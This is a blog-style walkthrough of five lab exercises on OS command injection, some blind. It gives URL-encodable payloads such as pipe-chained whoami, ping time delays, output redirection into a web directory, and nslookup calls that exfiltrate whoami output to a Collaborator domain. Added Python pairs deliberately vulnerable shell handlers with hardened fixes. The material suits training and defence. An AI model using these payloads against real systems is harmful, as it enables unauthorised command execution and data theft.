root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


OS command injection, simple case


Task

Navigate to the website.

Capture this request in Burp Suite and send it over to Burp Repeater.

So the vulnerability lies in the storeId parameter.

Checking PayloadsAllTheThings, I saw a section on chaining commands: we can execute whoami by chaining it onto the store ID with a pipe. The original command's output is piped into whoami, which ignores its standard input, so what comes back in the response is whoami's output instead of the original command's. So we'll have something like this

storeId=1|whoami

Sending this, we get the name of the current user in the response.

Checking the page in our browser confirms we have successfully completed the task.
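To see why a bare pipe works, here is an added example (my own Python, not the lab's backend): a constructed stand-in for the stock-check handler in which echo plays the role of the real script. The vulnerable version builds a shell command line from the parameters; the two fixed versions pass them as argv entries, and the hardened one also allow-lists the expected digits first. The id -u probe is used alongside whoami only because its output can be checked against os.geteuid().

```python
import os
import re
import subprocess


def check_stock_vulnerable(product_id: str, store_id: str) -> str:
    """Constructed stand-in for the lab's stock checker: both parameters are
    concatenated into a shell command line, which is the bug being exploited.
    (echo stands in for whatever script the real backend runs.)"""
    cmd = f"echo stock-report {product_id} {store_id}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def check_stock_argv(product_id: str, store_id: str) -> str:
    """Same backend without a shell: each value is one argv entry, so '|', ';',
    backticks and friends are ordinary characters, not shell operators."""
    result = subprocess.run(
        ["echo", "stock-report", product_id, store_id],
        capture_output=True, text=True,
    )
    return result.stdout.strip()


def check_stock_hardened(product_id: str, store_id: str) -> str:
    """Defence in depth: allow-list the expected shape, then avoid the shell."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not re.fullmatch(r"[0-9]{1,9}", value):
            raise ValueError(f"{name} must be a small positive integer")
    return check_stock_argv(product_id, store_id)


def current_uid() -> str:
    """What 'id -u' prints for this process; used to check the pipe probe."""
    return str(os.geteuid())


if __name__ == "__main__":
    # The page's payload storeId=1|whoami makes the shell run
    #   echo stock-report 1 1 | whoami
    # echo's output is piped into whoami, which ignores stdin, so the
    # "stock report" the app returns is really whoami's output.
    print("vulnerable :", check_stock_vulnerable("1", "1|whoami"))
    print("argv only  :", check_stock_argv("1", "1|whoami"))
    try:
        check_stock_hardened("1", "1|whoami")
    except ValueError as exc:
        print("hardened   : rejected ->", exc)
```

Note that the argv-only version is already immune to the injection; the allow-list on top of it is there so that a malformed store ID is rejected before anything is executed at all.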


Blind OS command injection with time delays


Task

Navigate to the webpage.

Let's capture this request and send it over to Burp Intruder.

We were told the vulnerability is in the feedback function, so we'll be injecting into the email field. Since nothing the command prints comes back in the response, we need a side effect we can observe, and a delay works. This payload causes a delay of about 10 seconds (ping -c 10 sends ten echo requests, one second apart):

||ping -c 10 127.0.0.1||

Applying that payload and ensuring it is URL-encoded (each | becomes %7C). Note the double pipe: || runs the command after it only when the command before it fails, so the injected ping fires when the email value leaves the original command broken, and the trailing || turns whatever the original command line had after the email field into a branch that only runs if ping fails.

Once the response arrives after the delay, checking the page in our browser shows we have successfully completed the task for this lab.


Blind OS command injection with output redirection


Task

Navigate to the webpage.

Capture this request in Burp Suite and send it over to Burp Repeater.

We are told that /var/www/images is writable by the web server, and the task is to execute the whoami command and retrieve its output. Since the output is not returned in the response, we redirect it into a file in that folder:

||whoami > /var/www/images/abeg.txt||

Ensure this is URL-encoded (the > becomes %3E).

Now let's view an image, capturing that request in Burp Suite and sending it over to Burp Repeater.

The file we redirected the whoami output into earlier was abeg.txt, so we change the image filename in this request to abeg.txt.

Cool, the response contains the output of whoami, so the command was executed and the image endpoint served our file from /var/www/images.

Checking the page in our browser confirms we have successfully solved this lab.
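Both blind labs above (time delay and output redirection) can be played through locally against a constructed stand-in for the feedback function. The following is an added example in Python, not the lab's code: the mail command it builds is an assumption, /nonexistent/mail deliberately does not exist so that the original command fails in the same way it does when the injection breaks it, and a temporary directory stands in for /var/www/images. sleep replaces the page's ping -c 10 so the demo finishes quickly and does not depend on ICMP being allowed.

```python
import os
import re
import subprocess
import tempfile
import time

# Stand-ins for the lab environment (constructed for this example).
WRITABLE_DIR = tempfile.mkdtemp(prefix="images-")  # plays the role of /var/www/images
MAIL = "/nonexistent/mail"  # a mail client that is NOT installed here (assumption)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def vulnerable_feedback(email: str) -> int:
    """Constructed blind sink: the address is pasted into a shell command line.
    Nothing the command prints reaches the client, only an HTTP status does.
    With email = '||sleep 2||' the shell runs
      /nonexistent/mail -s 'User feedback' -aFrom: || sleep 2 || support@...
    the missing binary fails (exit 127), so the right-hand side of || runs."""
    cmd = f"{MAIL} -s 'User feedback' -aFrom:{email} support@example.invalid"
    subprocess.run(cmd, shell=True, capture_output=True)
    return 200  # the app says "thanks" whatever the command did


def hardened_feedback(email: str) -> int:
    """Allow-list the address, then run the command without a shell."""
    if not EMAIL_RE.fullmatch(email):
        return 400
    try:
        subprocess.run([MAIL, "-s", "User feedback", f"-aFrom:{email}",
                        "support@example.invalid"], capture_output=True)
    except FileNotFoundError:
        return 500
    return 200


def _elapsed(handler, email: str) -> float:
    start = time.monotonic()
    handler(email)
    return time.monotonic() - start


def confirm_time_delay(handler, delay: int = 2, trials: int = 2) -> bool:
    """Time-based oracle: the injected sleep must add about `delay` seconds on
    top of the slowest benign response, so network jitter is not mistaken for
    a delay. min() over the injected trials guards against a lucky slow baseline."""
    baseline = max(_elapsed(handler, "user@example.invalid") for _ in range(trials))
    injected = min(_elapsed(handler, f"||sleep {delay}||") for _ in range(trials))
    return injected - baseline >= 0.8 * delay


def serve_image(filename: str) -> bytes:
    """Constructed stand-in for the image endpoint: returns a file from the
    web-served directory, which is what makes the written file retrievable."""
    with open(os.path.join(WRITABLE_DIR, filename), "rb") as fh:
        return fh.read()


def exfil_via_file(handler, command: str, filename: str = "abeg.txt") -> str:
    """The page's technique: redirect the command's output into the served
    directory, then fetch it through the image endpoint."""
    handler(f"||{command} > {os.path.join(WRITABLE_DIR, filename)}||")
    return serve_image(filename).decode().strip()


if __name__ == "__main__":
    print("delay confirmed, vulnerable:", confirm_time_delay(vulnerable_feedback))
    print("delay confirmed, hardened:  ", confirm_time_delay(hardened_feedback))
    print("whoami via output redirection:", exfil_via_file(vulnerable_feedback, "whoami"))
```

Against the hardened handler the payload is rejected with a 400 before any command runs, so the timing oracle reports no delay and the redirected file is never created. When the preceding command would succeed rather than fail, || never fires; that is the case to keep in mind when a ||-wrapped payload produces no delay, before concluding the parameter is not injectable.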


Blind OS command injection with out-of-band interaction


Task

Navigate to the webpage.

Capture this request in Burp Suite and send it over to Burp Repeater.

To solve this lab we have to make the server issue a DNS lookup to Burp Collaborator. Open the Burp Collaborator client and click "Copy to clipboard" to copy the generated domain. We can then use nslookup with that domain:

||nslookup 2ad7n17mkusj9u18hveevnj8zz5pte.oastify.com||

Ensure it is URL-encoded.

Checking the Burp Collaborator client window, we see the DNS query from the target, so the injected nslookup ran successfully.

Checking the webpage again confirms we have successfully solved the task.


Blind OS command injection with out-of-band data exfiltration


Task

Navigate to the website.

Capture this request in Burp Suite and send it over to Burp Repeater.

We have to execute the whoami command and exfiltrate its output via a DNS query to Burp Collaborator.

Click "Copy to clipboard" in the Burp Collaborator client to copy the generated domain. We again use nslookup, but this time with the output of whoami prepended as a subdomain: the backticks make the shell run whoami and substitute its output into the hostname before nslookup runs, so the username arrives as the leftmost label of the DNS query Collaborator records.

We can use the payload

||nslookup `whoami`.8clpqlx6r4oe0u0r87hwrnkonft5hu.oastify.com||

Ensure this is URL-encoded.

The Burp Collaborator client shows the DNS query with the username as its first label: the current user is peter-WmKLbv.

Submitting this name completes the lab 😎


Till Next Time :xD


